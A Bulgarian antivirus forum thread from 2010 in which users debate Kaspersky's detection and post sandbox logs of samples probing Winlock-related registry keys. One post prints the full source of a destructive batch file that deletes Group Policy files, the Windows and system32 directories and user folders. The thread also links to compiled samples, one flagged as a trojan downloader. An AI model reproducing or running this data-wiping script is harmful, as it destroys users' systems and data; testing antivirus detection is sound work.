Прави ми впечатление, че в последно време почти не виждам резултати от сканиране на Касапа....гледам, че заглъхна и ентусиазма към "жълтият лидер"! Защо ли? :biggrin:

Инженере,

Вече ми стана безинтересно.Ванката ги праща аз съм зает с чата...

Както се вижда съм в автоматичен режим но какво да се прави - нямат шанс горките изчадия

10.4.2010 г. 00:18:29 ч. JOKE.EXE Помещено в группу Слабые ограничения Имеет высокое значение эвристически рассчитанного рейтинга опасности Да

Прави ми впечатление, че в последно време почти не виждам резултати от сканиране на Касапа....гледам, че заглъхна и ентусиазма към "жълтият лидер"! Защо ли? :biggrin:

Няма вече лидер започнаха новите тестове :biggrin:

Какъв е смисъла да го стартираш в памперса,и да ги показваш тези логове?Дай нещо реално.

hklm\SOFTWARE\KASPERSKYLAB\SANDBOX\KLSB43\REGISTRY\USER

Какъв е смисъла да го стартираш в памперса,и да ги показваш тези логове?Дай нещо реално.

hklm\SOFTWARE\KASPERSKYLAB\SANDBOX\KLSB43\REGISTRY\USER

Що за въпрос - мислиш,че без памперс няма да е така ли?

10.4.2010 г. 00:37:23 ч. JOKE.EXE Помещено в группу Слабые ограничения Имеет высокое значение эвристически рассчитанного рейтинга опасности

10.4.2010 г. 00:37:23 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:23 ч. Запрещено: Winlock.AppInit_DLLs JOKE.EXE Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs

10.4.2010 г. 00:37:23 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\Security_HKLM_only Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:23 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\Security_HKLM_only Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:23 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\Security_HKLM_only Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:23 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CreateUriCacheSize Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:23 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:23 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:23 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:23 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:23 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:23 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:23 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:23 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\SpecialFoldersCacheSize Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:23 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:23 ч. TMPFILE1.BAT Помещено в группу Слабые ограничения Имеет высокое значение эвристически рассчитанного рейтинга опасности

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub TMPFILE1.BAT Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.AppInit_DLLs TMPFILE1.BAT Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub TMPFILE1.BAT Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\Levels Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub TMPFILE1.BAT Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\DefaultLevel Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub TMPFILE1.BAT Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\SaferFlags Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub TMPFILE1.BAT Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\LogFileName Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub TMPFILE1.BAT Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub TMPFILE1.BAT Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\AuthenticodeEnabled Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.AppInit_DLLs Windows Command Processor Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.AppInit_DLLs Windows Command Processor Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.AppInit_DLLs Windows Command Processor Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.AppInit_DLLs Windows Command Processor Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.AppInit_DLLs Windows Command Processor Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.AppInit_DLLs Windows Command Processor Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.AppInit_DLLs Windows Command Processor Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.AppInit_DLLs Windows Command Processor Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.AppInit_DLLs Windows Command Processor Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.AppInit_DLLs Windows Command Processor Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\Security_HKLM_only Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\Security_HKLM_only Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\Security_HKLM_only Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CreateUriCacheSize Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\SpecialFoldersCacheSize Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:24 ч. TMPFILE1.BAT Помещено в группу Слабые ограничения Имеет высокое значение эвристически рассчитанного рейтинга опасности

10.4.2010 г. 00:37:25 ч. Запрещено: Winlock.Policies.Values.Sub TMPFILE1.BAT Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:25 ч. Запрещено: Winlock.AppInit_DLLs TMPFILE1.BAT Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs

10.4.2010 г. 00:37:25 ч. Запрещено: Winlock.Policies.Values.Sub TMPFILE1.BAT Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\Levels Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:25 ч. Запрещено: Winlock.Policies.Values.Sub TMPFILE1.BAT Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\DefaultLevel Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:25 ч. Запрещено: Winlock.Policies.Values.Sub TMPFILE1.BAT Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\SaferFlags Winlock.Policies.Values.Sub

10.4.2010 г. 00:37:25 ч. Запрещено: Winlock.Policies.Values.Sub TMPFILE1.BAT Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\LogFileName Winlock.Policies.Values.Sub

Така реално ли е :)

Редактирано от nikssi (преглед на промените)

Файла съдържа това,

@echo off

cd \

echo Y|del "C:\WINDOWS\system32\GroupPolicy\Machine\Registry.pol"

echo Y|del "C:\WINDOWS\system32\GroupPolicy\User\Registry.pol"

echo Y|del "C:\WINDOWS\system32\GroupPolicy\gpt"

:tryagain

echo Y|del "C:\WINDOWS\system32\GroupPolicy\User\Registry.pol"

echo Y|del "C:\WINDOWS\system32\GroupPolicy\Machine\Registry.pol"

if exist "C:\WINDOWS\system32\GroupPolicy\Machine\Registry.pol" goto tryagain

rd "C:\WINDOWS\system32\"

echo Y|del "C:\WINDOWS\*.*"

rd "C:\Documents and Settings\All Users\" /s /q

echo Y|del "C:" EXIT

Метнах го на един онлайн конвертер бат то ехе :)

hxxp://www.skatafka.com/download.php?file=1597f1b46a184c63044a966bc4011d32 https://www.virustotal.com/analisis/90bcaa55e76551fdbd7e41c0d294699758e88e8e7da61c8e9db07014012a8e48-1270850858 Къде е този питон? Май за нищо не ставам - не мога да намеря опасното, дето някои го твърдят...Може и те да са си го измислили! Поздрави

Прави ми впечатление, че в последно време почти не виждам резултати от сканиране на Касапа....гледам, че заглъхна и ентусиазма към "жълтият лидер"! Защо ли? :)

Това е провокативно мнение.Напълно умишлена провокация.После говориш, че другите ти криви.Прочети си го пак и не се сърди, ако някой те напада, няма какво друго да очакваш.

А сега да ти отговоря.Ти защо мислиш, че е угаснал ентусиазмът, 'щото всички сме минали тайно на Аваст ли? :)

Това е провокативно мнение.Напълно умишлена провокация.После говориш, че другите ти криви.Прочети си го пак и не се сърди, ако някой те напада, няма какво друго да очакваш.

А сега да ти отговоря.Ти защо мислиш, че е угаснал ентусиазмът, 'щото всички сме минали тайно на Аваст ли? ;)

Ха ха ха....от всички, които са чели мнението ми, вкл. и предполагаемите "потърпевши", само ти "върза кънките"....нервак си! И го подтвърди! :)

Ха ха ха....от всички, които са чели мнението ми, вкл. и предполагаемите "потърпевши", само ти "върза кънките"....нервак си! И го подтвърди! :P

clonnning за разлика от други анализиращи критици има интересни постове :) Критикуващи,разбиващи но интересни.

Ха ха ха....от всички, които са чели мнението ми, вкл. и предполагаемите "потърпевши", само ти "върза кънките"....нервак си! И го подтвърди! :P

А ти постоянно бягаш по тъча.Сега отново.Дали съм нервак, няма значение, най-малкото, защото не дава отговор на въпроса дали ти си провокатор, а аз това казах.Ти, нито се защити по някакъв начин, нито го потвърди, ами реши да кажеш какъв съм аз.Ето, цитирам отново мнението ти, за което твърдя, че е провокация:

Прави ми впечатление, че в последно време почти не виждам резултати от сканиране на Касапа....гледам, че заглъхна и ентусиазма към "жълтият лидер"! Защо ли?

Или накратко:''гледам, ама не виждам'' :D

Забелязваш ли на кои моменти съм наблегнал?На ТЕБ ти прави впечатление, че ТИ не виждаш нещо си и ТИ гледаш, че заглъхнал ентусиазмът.След като в това изказване ясно личи, че твърдението ти ''лежи'' единствено на ТВОИТЕ наблюдения, за каква обективност може да става дума?И накрая въпросчето ''защо ли'', на което единствено ТИ можеш да дадеш смислен отговор.

@nikssi, благодаря за мнението и за плюсчето.:)

hxxp://www.skatafka.com/download.php?file=35723437230d5c4020f752ba3eb57a81

http://www.virustotal.com/analisis/ae30fae590b46b5e0a72c4b1e48340d7c811b152dbe6902d79807b50beefa998-1270886099

Редактирано от clonnning (преглед на промените)

МБАМ го засече, a-squared -не :baby:

hxxp://www.skatafka.com/download.php?file=35723437230d5c4020f752ba3eb57a81

http://www.virustotal.com/analisis/ae30fae590b46b5e0a72c4b1e48340d7c811b152dbe6902d79807b50beefa998-1270886099

Евристично определяне като HEUR:Trojan-Downloader.Win32.Generic

713bbe76dd07.jpg

Евристично определяне като HEUR:Trojan-Downloader.Win32.Generic

713bbe76dd07.jpg

Писах на Касперски да го добавят като дефиниция и ми отговориа

Hello,

This message is generated by automatic letter reception system. The report contains information on what the verdicts on the files (if any in the letter) makes antivirus with latest updates. Letter will be passed to the virus analyst.

setup.exe

This file is in process.

Best Regards, Kaspersky Lab

Оказва се, че се засича само евристично и то само от някои.Интересно.:baby:

Оказва се, че се засича само евристично и то само от някои.Интересно.;)

Странно ли е :baby: И аз се чудя не по малко от тебе. Искаш ли да спра антивируса и да го стартирам?

h ttp://stephenmccrea.net/AWStats/wpharmajanuaryuser/p=22.html

036ba68ba545.jpg

Гост
Тази тема е заключена за нови отговори.

Разглеждащи това в момента 0

  • Няма регистрирани потребители разглеждащи тази страница.

Дарение

  • Подкрепи съществуването на форума - направи дарение
    32%
    Дарени 315 € от нужните 1 000 €

Бюлетин

Получавайте известие, когато има важна промяна или новина свързана с форума.

Профил

Навигация

Търсене

Търсене

Конфигуриране на push известия в браузъра

Chrome (Android)
  1. Докоснете иконата на катинар до адресната лента.
  2. Докоснете Разрешения → Известия.
  3. Променете предпочитанията си.
Chrome (Desktop)
  1. Кликнете върху иконата на катинар в адресната лента.
  2. Изберете Настройки на сайта.
  3. Намерете Известия и коригирайте предпочитанията си.